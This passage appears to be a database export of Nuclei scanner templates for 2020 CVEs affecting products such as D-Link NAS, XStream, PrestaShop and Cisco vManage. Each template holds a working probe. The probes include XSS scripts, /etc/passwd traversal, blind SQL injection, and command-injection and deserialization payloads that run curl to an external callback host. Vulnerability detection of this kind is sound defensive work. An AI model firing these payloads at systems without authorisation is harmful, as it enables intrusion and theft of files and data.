4a0a0047304502205dc1664f5c457024a05322ea4f90f1b555fa287fa88d891fdd22ab9f01254c6f022100a2775475c594fb68dc732630b5d0861715e7d2b5e50722a65a2206ffcd920929:922c64590222798bb761d5b6d8e72950", "hash": "82786e98a3304bb9e671ed0ec1a902e4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081de" }, "name": "CVE-2020-25495.yaml", "content": "id: CVE-2020-25495\n\ninfo:\n name: Xinuo Openserver 5/6 - Cross-Site scripting\n author: 0x_Akoko\n severity: medium\n description: Xinuo (formerly SCO) Openserver versions 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section' and is vulnerable to reflected cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts or steal sensitive information from users.\n remediation: |\n Apply the latest security patches or updates provided by Xinuo to fix the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49300\n - https://github.com/Ramikan/Vulnerabilities/blob/master/SCO%20Openserver%20XSS%20%26%20HTML%20Injection%20vulnerability\n - http://packetstormsecurity.com/files/160634/SCO-Openserver-5.0.7-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25495\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-25495\n cwe-id: CWE-79\n epss-score: 0.00176\n epss-percentile: 0.54822\n cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xinuos\n product: openserver\n tags: cve2020,cve,sco,xss,edb,packetstorm,intrusive,xinuos\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n -

    hello

    \n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dab9da2a59ed710339783e84dbbc12f3cc1adb05a029a643e3c3037fa79634da0221008573313bc71495d933a0ad06e73c00e9060d06fd606de84cea42bd1be3ce68b5:922c64590222798bb761d5b6d8e72950", "hash": "66ec5161e271f4d2fdcdff170a83b95d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081df" }, "name": "CVE-2020-25506.yaml", "content": "id: CVE-2020-25506\n\ninfo:\n name: D-Link DNS-320 - Unauthenticated Remote Code Execution\n author: gy741\n severity: critical\n description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware update provided by D-Link to mitigate this vulnerability.\n reference:\n - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675\n - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25506\n - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183\n - https://www.dlink.com/en/security-bulletin/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-25506\n cwe-id: CWE-78\n epss-score: 0.97383\n epss-percentile: 0.99903\n cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: dlink\n product: dns-320_firmware\n tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/system_mgr.cgi? HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n - |\n POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 4a0a004730450221008603407556f5d86d00fc35eb29d8dfabfafad112a165be5c7341165845aac25802204d9d3505889d5f2e6e0aaf6df6add1895a70a6f9ebfed6e2022cb1654f9e342f:922c64590222798bb761d5b6d8e72950", "hash": "a01fb7f17b609db207452589807b399f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e0" }, "name": "CVE-2020-2551.yaml", "content": "id: CVE-2020-2551\n\ninfo:\n name: Oracle WebLogic Server - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n Oracle WebLogic Server (Oracle Fusion Middleware (component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 2.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability could allow unauthenticated attackers with network access via IIOP to compromise Oracle WebLogic Server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by Oracle to mitigate this vulnerability.\n reference:\n - https://github.com/hktalent/CVE-2020-2551\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2551\n - https://www.oracle.com/security-alerts/cpujan2020.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-2551\n epss-score: 0.97491\n epss-percentile: 0.99973\n cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: weblogic_server\n tags: cve2020,cve,oracle,weblogic,rce,unauth,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/console/login/LoginForm.jsp\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"10.3.6.0\"\n - \"12.1.3.0\"\n - \"12.2.1.3\"\n - \"12.2.1.4\"\n condition: or\n\n - type: word\n part: body\n words:\n - \"WebLogic\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202870c3b1ea333869c202cd0988502ae3b1582d4b38ce1c7db483240b803ea92502203c70ee8d4e58c93bdeb345eff7fe2b91ff4f7d767a012e2b2ff738febbddedf0:922c64590222798bb761d5b6d8e72950", "hash": "576cf74644ac5391835b8bcc75758da2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e1" }, "name": "CVE-2020-25540.yaml", "content": "id: CVE-2020-25540\n\ninfo:\n name: ThinkAdmin 6 - Local File Inclusion\n author: geeknik\n severity: high\n description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Apply the latest patch or upgrade to a version that is not affected by the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/48812\n - https://github.com/zoujingli/ThinkAdmin/issues/244\n - https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/\n - http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25540\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-25540\n cwe-id: CWE-22\n epss-score: 0.96711\n epss-percentile: 0.99631\n cpe: cpe:2.3:a:thinkadmin:thinkadmin:6.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thinkadmin\n product: thinkadmin\n tags: cve,cve2020,thinkadmin,lfi,edb,packetstorm,ctolog\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220351956c4076b5c945da78c1f7ca4b062470b1039145c21aafaaccaea5044b9db02207d554851aec1c74cc8061be5f627d90b05ec7fa28a738c86a1f391b4acf10174:922c64590222798bb761d5b6d8e72950", "hash": "c5acb04c4a6109f30cca06c449e4b79c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e2" }, "name": "CVE-2020-25780.yaml", "content": "id: CVE-2020-25780\n\ninfo:\n name: Commvault CommCell - Local File Inclusion\n author: pdteam\n severity: high\n description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system.\n remediation: |\n Apply the latest security patches or updates provided by Commvault to fix the local file inclusion vulnerability.\n reference:\n - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html\n - http://kb.commvault.com/article/63264\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25780\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-25780\n cwe-id: CWE-22\n epss-score: 0.04166\n epss-percentile: 0.92003\n cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: commvault\n product: commcell\n tags: cve,cve2020,commvault,lfi\n\nhttp:\n - method: POST\n path:\n - \"http://{{Host}}:81/SearchSvc/CVSearchService.svc\"\n\n body: |\n \n \n \n \n c:/Windows/system.ini\n \n \n \n\n headers:\n Cookie: Login\n soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile\n content-type: text/xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"downLoadFileResult\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009728b39a66e9d6ccd54fd30251759972397ef95674ba421b6c0c222ae0c22775022100f01f50ac834da9c53218a08bead765f946e867beaa00534cd26bf9d29b7e74d1:922c64590222798bb761d5b6d8e72950", "hash": "caf59fb916c1d56696973684296dd222", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e3" }, "name": "CVE-2020-25864.yaml", "content": "id: CVE-2020-25864\n\ninfo:\n name: HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting\n author: c-sh0\n severity: medium\n description: |\n HashiCorp Consul and Consul Enterprise up to version 1.9.4 are vulnerable to cross-site scripting via the key-value (KV) raw mode.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Consul/Consul Enterprise application.\n remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14.\n reference:\n - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368\n - https://www.hashicorp.com/blog/category/consul\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25864\n - https://security.gentoo.org/glsa/202208-09\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-25864\n cwe-id: CWE-79\n epss-score: 0.00324\n epss-percentile: 0.70154\n cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:*\n metadata:\n max-request: 2\n vendor: hashicorp\n product: consul\n tags: cve,cve2020,consul,xss,intrusive,hashicorp\n\nhttp:\n - raw:\n - |\n PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n\n \n - |\n GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - text/html\n\n - type: word\n part: body_2\n words:\n - \n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bbb346c3a43f73c414eb6ed526792050eb465a32f0a28251cad292479212181c02206d6bd66c126ad94302fd362178e914dd5d99e7af5cec7deffc553e0699899b9a:922c64590222798bb761d5b6d8e72950", "hash": "c889b2db1780ef83c1141944e49adbe2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e4" }, "name": "CVE-2020-26073.yaml", "content": "id: CVE-2020-26073\n\ninfo:\n name: Cisco SD-WAN vManage Software - Local File Inclusion\n author: madrobot\n severity: high\n description: |\n Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the affected system.\n remediation: |\n Apply the latest security patches provided by Cisco to fix the vulnerability.\n reference:\n - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073\n classification:\n cve-id: CVE-2020-26073\n metadata:\n max-request: 1\n tags: cve,cve2020,cisco,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: status\n status:\n - 200\n\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n part: body\n# digest: 4a0a00473045022039766848e039513d1de75fa4526a5cd9bd3ee54b8e0204e824e5e3f2a4abd8340221008795b9f415bd03ded961e86016a7a3f2d3546ccc02c4aa1b9afaf7550bb1adbc:922c64590222798bb761d5b6d8e72950", "hash": "0daded9aeb0b5186d51711171bbaea47", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e5" }, "name": "CVE-2020-26153.yaml", "content": "id: CVE-2020-26153\n\ninfo:\n name: Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Event Espresso Core-Reg 4.10.7.p is vulnerable to cross-site scripting in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php and allows remote attackers to inject arbitrary web script or HTML via the page parameter.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: |\n Upgrade to Event Espresso Core-Reg version 4.10.7.p or later to mitigate this vulnerability.\n reference:\n - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/\n - https://github.com/eventespresso/event-espresso-core/compare/4.10.6.p...4.10.7.p\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26153\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-26153\n cwe-id: CWE-79\n epss-score: 0.00127\n epss-percentile: 0.47114\n cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: eventespresso\n product: event_espresso\n framework: wordpress\n tags: cve2020,cve,xss,wordpress,wp-plugin,eventespresso\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Event Espresso'\n - 'Tested up to:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"/>'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100ae2a684b5e05ec99dd3247ebd3073b2e1492e47b631ea52607d7358c3183cfbf022100ece622cb3353e1a1d12f6e1f82cca55fcd1dea2de4dc325b2be673547060969f:922c64590222798bb761d5b6d8e72950", "hash": "513d22b409af7a3642d1fbc1e8790dbd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e6" }, "name": "CVE-2020-26214.yaml", "content": "id: CVE-2020-26214\n\ninfo:\n name: Alerta < 8.1.0 - Authentication Bypass\n author: CasperGN,daffainfo\n severity: critical\n description: Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind requests.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to Alerta.\n remediation: |\n Upgrade Alerta to version 8.1.0 or later to mitigate this vulnerability.\n reference:\n - https://github.com/advisories/GHSA-5hmm-x8q8-w5jh\n - https://tools.ietf.org/html/rfc4513#section-5.1.2\n - https://pypi.org/project/alerta-server/8.1.0/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26214\n - https://github.com/alerta/alerta/commit/2bfa31779a4c9df2fa68fa4d0c5c909698c5ef65\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-26214\n cwe-id: CWE-287\n epss-score: 0.01546\n epss-percentile: 0.85739\n cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: alerta_project\n product: alerta\n tags: cve,cve2020,alerta,auth-bypass,alerta_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/api/config'\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '< 8.1.0')\n\n - type: word\n part: body\n words:\n - '\"alarm_model\"'\n - '\"actions\"'\n - '\"severity\"'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - '\"name\": \"Alerta ([0-9.]+)\"'\n internal: true\n\n - type: regex\n group: 1\n regex:\n - '\"name\": \"Alerta ([0-9.]+)\"'\n# digest: 4a0a00473045022100e204bd9385cf6b58f653e6b232edefbe1ce420d88afa77870717ebc626d8a2ea022067167ad2a0440c6d8e17db9ad35d149a90e5b289ee02d11bcaf428a2b3af61cf:922c64590222798bb761d5b6d8e72950", "hash": "202a4f7dae34ddf0ea60d6c02a793aa5", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e7" }, "name": "CVE-2020-26217.yaml", "content": "id: CVE-2020-26217\n\ninfo:\n name: XStream <1.4.14 - Remote Code Execution\n author: pwnhxl,vicrack\n severity: high\n description: |\n XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: Fixed in 1.4.14.\n reference:\n - https://x-stream.github.io/CVE-2020-26217.html\n - https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a\n - https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2\n - https://nvd.nist.gov/vuln/detail/cve-2020-26217\n - https://lists.apache.org/thread.html/r2de526726e7f4db4a7cb91b7355070779f51a84fd985c6529c2f4e9e@%3Cissues.activemq.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-26217\n cwe-id: CWE-78\n epss-score: 0.97384\n epss-percentile: 0.99904\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve,cve2020,xstream,deserialization,rce,oast,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n 0\n \n \n \n text/plain\n \n \n \n \n 0\n -1\n 1\n \n \n \n curl\n http://{{interactsh-url}}\n \n \n \n \n \n \n java.lang.ProcessBuilder\n start\n \n \n start\n \n \n \n KEYS\n \n \n \n 0\n 0\n 0\n \n \n false\n \n \n \n 0\n \n \n test\n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4b0a00483046022100833148b184c9a024daabe14d4fef1a74835dd8f418140ce52d04df763175d9e8022100f65031aa40e1c23f6150f38f0f8737a2ac23a8e5c5f4cc29f48a0de92a01de3c:922c64590222798bb761d5b6d8e72950", "hash": "d445ddea199abc7899454b32ee4a068b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e8" }, "name": "CVE-2020-26248.yaml", "content": "id: CVE-2020-26248\n\ninfo:\n name: PrestaShop Product Comments <4.2.0 - SQL Injection\n author: edoardottt\n severity: high\n description: |\n PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in 4.2.1.\n reference:\n - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html\n - https://packagist.org/packages/prestashop/productcomments\n - https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26248\n - https://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffa\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\n cvss-score: 8.2\n cve-id: CVE-2020-26248\n cwe-id: CWE-89\n epss-score: 0.01617\n epss-percentile: 0.87187\n cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: prestashop\n product: productcomments\n framework: prestashop\n tags: cve,cve2020,packetstorm,sqli,prestshop,prestashop\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"average_grade\")'\n condition: and\n# digest: 4b0a00483046022100bfb60507528a715a3186e6f06262c9534c16003bc96c3baa4049108a3d06d67a0221008662896abf6d4938c136f30d2492fc638fb1157aea901a3875741b3251869743:922c64590222798bb761d5b6d8e72950", "hash": "5b134b48636a3791fcf2bae14f0ce363", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e9" }, "name": "CVE-2020-26258.yaml", "content": "id: CVE-2020-26258\n\ninfo:\n name: XStream <1.4.15 - Server-Side Request Forgery\n author: pwnhxl\n severity: high\n description: |\n XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to data leakage or further attacks.\n remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher.\n reference:\n - https://x-stream.github.io/CVE-2020-26258.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258\n - https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26258\n - https://lists.apache.org/thread.html/r97993e3d78e1f5389b7b172ba9f308440830ce5f051ee62714a0aa34@%3Ccommits.struts.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 7.7\n cve-id: CVE-2020-26258\n cwe-id: CWE-918\n epss-score: 0.90088\n epss-percentile: 0.98718\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve,cve2020,xstream,ssrf,oast,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n 0\n \n \n \n http://{{interactsh-url}}/internal/:\n \n \n \n 0\n \n \n test\n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: Java\"\n# digest: 4a0a0047304502210090b286f58ae4ddf71281f47e94a6932952a067406a9d9bd4978cee28462a401b02207bc498dd31d9e55e2a847a6900d2537b77406a0208b97997e752e77bbc887dfe:922c64590222798bb761d5b6d8e72950", "hash": "94a89846e9070bb2dff170be4e32e622", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ea" }, "name": "CVE-2020-26413.yaml", "content": "id: CVE-2020-26413\n\ninfo:\n name: Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure\n author: _0xf4n9x_,pikpikcu\n severity: medium\n description: GitLab CE and EE 13.4 through 13.6.2 is susceptible to Information disclosure via GraphQL. User email is visible. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n An attacker can gain unauthorized access to sensitive information.\n remediation: |\n Upgrade Gitlab CE/EE to version 13.6.3 or later.\n reference:\n - https://gitlab.com/gitlab-org/gitlab/-/issues/244275\n - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26413\n - https://hackerone.com/reports/972355\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-26413\n cwe-id: CWE-200\n epss-score: 0.74714\n epss-percentile: 0.97878\n cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*\n metadata:\n max-request: 1\n vendor: gitlab\n product: gitlab\n shodan-query: http.title:\"GitLab\"\n tags: cve,cve2020,hackerone,gitlab,exposure,enum,graphql\n\nhttp:\n - raw:\n - |\n POST /api/graphql HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"query\": \"{\\nusers {\\nedges {\\n node {\\n username\\n email\\n avatarUrl\\n status {\\n emoji\\n message\\n messageHtml\\n }\\n }\\n }\\n }\\n }\",\n \"variables\": null,\n \"operationName\": null\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"username\":'\n - '\"avatarUrl\":'\n - '\"node\":'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: json\n json:\n - '.data.users.edges[].node.email'\n part: body\n# digest: 490a0046304402207563b8edc19efc3cc19d14fdb717c94e8c29de7443af2fdb01addacf38917ef7022035b462d59175b05bc03b8666aa7cab3aebb000b9c0e22dec14d0dc05b0dfe876:922c64590222798bb761d5b6d8e72950", "hash": "d54cac6d0f6173edb0c9ba0be926b669", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081eb" }, "name": "CVE-2020-26876.yaml", "content": "id: CVE-2020-26876\n\ninfo:\n name: WordPress WP Courses Plugin Information Disclosure\n author: dwisiswant0\n severity: high\n description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information about the WordPress WP Courses Plugin.\n remediation: |\n Update to the latest version of the WordPress WP Courses Plugin (1.0.9) to fix the information disclosure vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26876\n - https://www.exploit-db.com/exploits/48910\n - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/\n - https://plugins.trac.wordpress.org/changeset/2388997\n - https://plugins.trac.wordpress.org/changeset/2389243\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n 